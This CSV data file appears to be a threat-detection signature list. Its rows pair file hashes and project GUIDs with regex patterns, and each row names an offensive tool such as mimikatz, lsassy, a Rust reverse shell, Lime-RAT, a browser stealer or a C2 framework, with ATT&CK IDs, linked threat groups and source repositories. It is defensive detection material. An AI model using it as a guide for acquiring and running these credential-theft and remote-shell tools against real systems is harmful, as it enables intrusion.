"*86c1800ab9c9f90d5d5ce81a1f1daae1446cdb98686c59b4d5336216725bfb8e*",".{0,1000}86c1800ab9c9f90d5d5ce81a1f1daae1446cdb98686c59b4d5336216725bfb8e.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","30332"
"*86c2b33a1b4eace0a52da1e4ca7371de14c15ea2551b6a1d1c4ba2735d5cb565*",".{0,1000}86c2b33a1b4eace0a52da1e4ca7371de14c15ea2551b6a1d1c4ba2735d5cb565.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30333"
"*86c9741c985ac8e026364c31af6c288c88e4d36d34321be5adb26c595d3f6675*",".{0,1000}86c9741c985ac8e026364c31af6c288c88e4d36d34321be5adb26c595d3f6675.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30335"
"*86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49*",".{0,1000}86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","30336"
"*86dce81496e79c16628d56c2a4b9c0ef2d22a5de0b3f84394b306f2705a18829*",".{0,1000}86dce81496e79c16628d56c2a4b9c0ef2d22a5de0b3f84394b306f2705a18829.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","30337"
"*86dd7c02ed1f529e5c2ec48b1da08d2570769caaa8250aaf5c4438e2aa5558a6*",".{0,1000}86dd7c02ed1f529e5c2ec48b1da08d2570769caaa8250aaf5c4438e2aa5558a6.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","30338"
"*86dfbd71a69913b1a1a5303da9a7cbe612bdcf798717ab9db54cf876b589a03f*",".{0,1000}86dfbd71a69913b1a1a5303da9a7cbe612bdcf798717ab9db54cf876b589a03f.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30339"
"*86e37a3b78826bd1c9ebd6b6c65eab9e81261af8f18abe8fda8311ce500e4316*",".{0,1000}86e37a3b78826bd1c9ebd6b6c65eab9e81261af8f18abe8fda8311ce500e4316.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30340"
"*86F8C733-F773-4AD8-9282-3F99953261FD*",".{0,1000}86F8C733\-F773\-4AD8\-9282\-3F99953261FD.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","30344"
"*86f965be880424c4cee7e1701532b5531da9b10db1c430f289c68b13edbb33f7*",".{0,1000}86f965be880424c4cee7e1701532b5531da9b10db1c430f289c68b13edbb33f7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30345"
"*86fc2c94f8fa3938e3261d0b9eb4836be289f8ae*",".{0,1000}86fc2c94f8fa3938e3261d0b9eb4836be289f8ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","30346"
"*86FC4B74-3B12-4C72-AA6C-084BF98E5E9A*",".{0,1000}86FC4B74\-3B12\-4C72\-AA6C\-084BF98E5E9A.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30347"
"*86FF6D04-208C-442F-B27C-E4255DD39402*",".{0,1000}86FF6D04\-208C\-442F\-B27C\-E4255DD39402.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30348"
"*8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3*",".{0,1000}8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30350"
"*870816a0e737187219a0d5034b0dc9d492763b27bff3443fb291bf226a83cc33*",".{0,1000}870816a0e737187219a0d5034b0dc9d492763b27bff3443fb291bf226a83cc33.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30352"
"*8708e2f8c867cf8fda8303837364b2b0184cfa6984febd6c218dc92ee318ea55*",".{0,1000}8708e2f8c867cf8fda8303837364b2b0184cfa6984febd6c218dc92ee318ea55.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30353"
"*87135ab4-4cf7-454c-8830-38eb3ede1241*",".{0,1000}87135ab4\-4cf7\-454c\-8830\-38eb3ede1241.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#GUIDproject","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","30355"
"*8714f9c15c56b5a6aebb5e90fe59a2f952df8f0759d776e851a1064f159e89a0*",".{0,1000}8714f9c15c56b5a6aebb5e90fe59a2f952df8f0759d776e851a1064f159e89a0.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","30356"
"*8719279d2e1abc87d952b144cca5724b9e513958ddacd679624cef890618880e*",".{0,1000}8719279d2e1abc87d952b144cca5724b9e513958ddacd679624cef890618880e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30357"
"*871e9cbecbcdcd82c1a0b696923ef45b8225351e9294ba8086658a28f8b9ac94*",".{0,1000}871e9cbecbcdcd82c1a0b696923ef45b8225351e9294ba8086658a28f8b9ac94.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30358"
"*87221cdeec621e8f4b489b84dbffb6910c7aaa9e4beba96a8d8419626bf1a3b3*",".{0,1000}87221cdeec621e8f4b489b84dbffb6910c7aaa9e4beba96a8d8419626bf1a3b3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30359"
"*87230dfc37d3e1c054f985f31d348b6d7ff459d976085843859e226d8723d720*",".{0,1000}87230dfc37d3e1c054f985f31d348b6d7ff459d976085843859e226d8723d720.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30360"
"*87243dc6506269a0a678c529ba9717e9c810cc83f563f92833f177e5c516703d*",".{0,1000}87243dc6506269a0a678c529ba9717e9c810cc83f563f92833f177e5c516703d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30361"
"*872ee783ea0fc1ed1d646611c77a424568a0a90f0d7b5a0dc430f248a0b824ee*",".{0,1000}872ee783ea0fc1ed1d646611c77a424568a0a90f0d7b5a0dc430f248a0b824ee.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","30362"
"*8736fa868de0d4514330dab361a3d4ccebd81ccfe7df2003d419aef14849b2fe*",".{0,1000}8736fa868de0d4514330dab361a3d4ccebd81ccfe7df2003d419aef14849b2fe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30363"
"*873b9cdf08884f8406ff6d65e56cbfd2a46c56bcb4eb789fb9e85c34907fd748*",".{0,1000}873b9cdf08884f8406ff6d65e56cbfd2a46c56bcb4eb789fb9e85c34907fd748.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30365"
"*873f95ecce406d76193e9b9b29b8ee05df1089de9f40f47b222e661263e6a56b*",".{0,1000}873f95ecce406d76193e9b9b29b8ee05df1089de9f40f47b222e661263e6a56b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30366"
"*873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e*",".{0,1000}873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30367"
"*8742b933c06da3e2de7f8945520870da234a5744bddd18c5339ff4b1faf0ad57*",".{0,1000}8742b933c06da3e2de7f8945520870da234a5744bddd18c5339ff4b1faf0ad57.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30368"
"*87440f0b-dacf-4695-a483-031fdc0b0194*",".{0,1000}87440f0b\-dacf\-4695\-a483\-031fdc0b0194.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#GUIDproject","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","30369"
"*8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487*",".{0,1000}8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30370"
"*874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c*",".{0,1000}874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30371"
"*87582936adeabd882de92613193a3fefdc2d388238a7c67c3bb41666ac3b2dda*",".{0,1000}87582936adeabd882de92613193a3fefdc2d388238a7c67c3bb41666ac3b2dda.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30373"
"*875a8faa095079fb31413ed16454c8d9ef0a23199984ac734e882c99914975ea*",".{0,1000}875a8faa095079fb31413ed16454c8d9ef0a23199984ac734e882c99914975ea.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","30374"
"*875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b*",".{0,1000}875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30375"
"*875fdc51b4427def008cdd88a81241e4791eb002c7d70fd8b71084ed8b6831ec*",".{0,1000}875fdc51b4427def008cdd88a81241e4791eb002c7d70fd8b71084ed8b6831ec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30376"
"*8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555*",".{0,1000}8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30377"
"*876236cb7297de4232a08d57ff6e5929ad522d150f35a288915f9e0a1d4b9968*",".{0,1000}876236cb7297de4232a08d57ff6e5929ad522d150f35a288915f9e0a1d4b9968.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","30378"
"*87623bf79b1d7bbd0e66a6e6c5e534afdef66debdd5ff363648cb5482e7a6ed7*",".{0,1000}87623bf79b1d7bbd0e66a6e6c5e534afdef66debdd5ff363648cb5482e7a6ed7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30379"
"*8769a14055d8c1d1f2dce1642ba7fdf3f8d4c24cafee7348857403905c50f4d6*",".{0,1000}8769a14055d8c1d1f2dce1642ba7fdf3f8d4c24cafee7348857403905c50f4d6.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30381"
"*876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477*",".{0,1000}876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30382"
"*877d4290b0f991fcf2fb3e5f64916a2dfb844280010df806d28a94ad57f0de07*",".{0,1000}877d4290b0f991fcf2fb3e5f64916a2dfb844280010df806d28a94ad57f0de07.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#filehash","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","30387"
"*878273cce2ef59c3bf4a3e4533a6b4101c9a21d57cc629cabe12ef6a05c8dda9*",".{0,1000}878273cce2ef59c3bf4a3e4533a6b4101c9a21d57cc629cabe12ef6a05c8dda9.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","30389"
"*8785484adcc6ef562248e172e23ebb36ab0b7b500281a56230bb102295586897*",".{0,1000}8785484adcc6ef562248e172e23ebb36ab0b7b500281a56230bb102295586897.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","30390"
"*878a57b1c2dc3321cfb5728358e482230b6efb7f08a116fb12ac0a26ce63335d*",".{0,1000}878a57b1c2dc3321cfb5728358e482230b6efb7f08a116fb12ac0a26ce63335d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30392"
"*87904247-C363-4F12-A13A-3DA484913F9E*",".{0,1000}87904247\-C363\-4F12\-A13A\-3DA484913F9E.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","#GUIDproject","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","30394"
"*8793997d31b23280ec1a46ff7fd065a6510ea66fcbf12651583244805e958212*",".{0,1000}8793997d31b23280ec1a46ff7fd065a6510ea66fcbf12651583244805e958212.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","30396"
